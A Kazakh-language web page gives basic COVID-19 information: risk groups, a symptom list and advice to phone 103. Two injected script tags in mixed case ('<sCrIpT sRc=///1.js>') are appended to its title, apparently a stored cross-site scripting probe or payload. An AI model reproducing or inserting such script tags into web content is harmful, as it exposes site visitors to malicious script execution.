Сіз білуіңіз қажет! Covid-2019 коронавирусынан сақтану шаралары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.04.2021

Covid-2019. Бұл не?

Covid-2019 – коронавирустың осы уақытқа дейін анықталмаған жаңа түрі. Коронавирустар көбіне жануарларды зақымдайтын вирустар тұқымдасы болып табылады, бірақ кей жағдайда адамға да жұғуы мүмкін. Covid-2019 – коронавирустың адам ағзасына әсер ете алатын жетінші түрі.

Коронавирустың қаупі қандай?

Қалыпты жағдайда Covid-2019 жұқпасынан кейін асқыну қаупі жоқ. Бұл вирус:

  • 65 жастан асқан адамдарға;
  • бес жасқа дейінгі балаларға;
  • жүкті әйелдерге;
  • иммунитеті әлсіз не жүрек, өкпе, бүйректің созылмалы аурулары бар адамдарға қауіп туғызуы ықтимал.

Сырқат кей науқастарда ауыр түрде өтіп, пневмония мен тыныс алудың қиындауына әкелуі мүмкін. Сирек жағдайда вирус өлімге әкеледі.

Covid-2019 симптомдары

Коронавирус кәдімгі тұмау тәрізді болғандықтан, оның алғашқы белгілерін көп адам байқай бермейді. Дегенмен, дәрігерлер келесі симптомдар білінсе, бірден дабыл қағуға кеңес береді:

  • дене қызуының көтерілуі, жоғары тепмература;
  • құрғақ қатты жөтел;
  • бастың ауруы;
  • кеуде тұсының ауруы;
  • ентікпе және тыныс алудың бұзылуы;
  • жүрек қағысының жиілеуі;
  • пневмония;
  • безгек;
  • мұрынның бітуі;
  • фарингит;
  • диарея.

Осындай симптомдарды байқасаңыз, 103 нөміріне хабарласып, бірден медициналық мекемеге хабар беріңіз. Әсіресе вирус тараған елдерден сапарлап келген болсаңыз, міндетті түрде тексерілген жөн.

Просмотров: 663


Пікір қосу



Деректерді қолтаңбаға қосу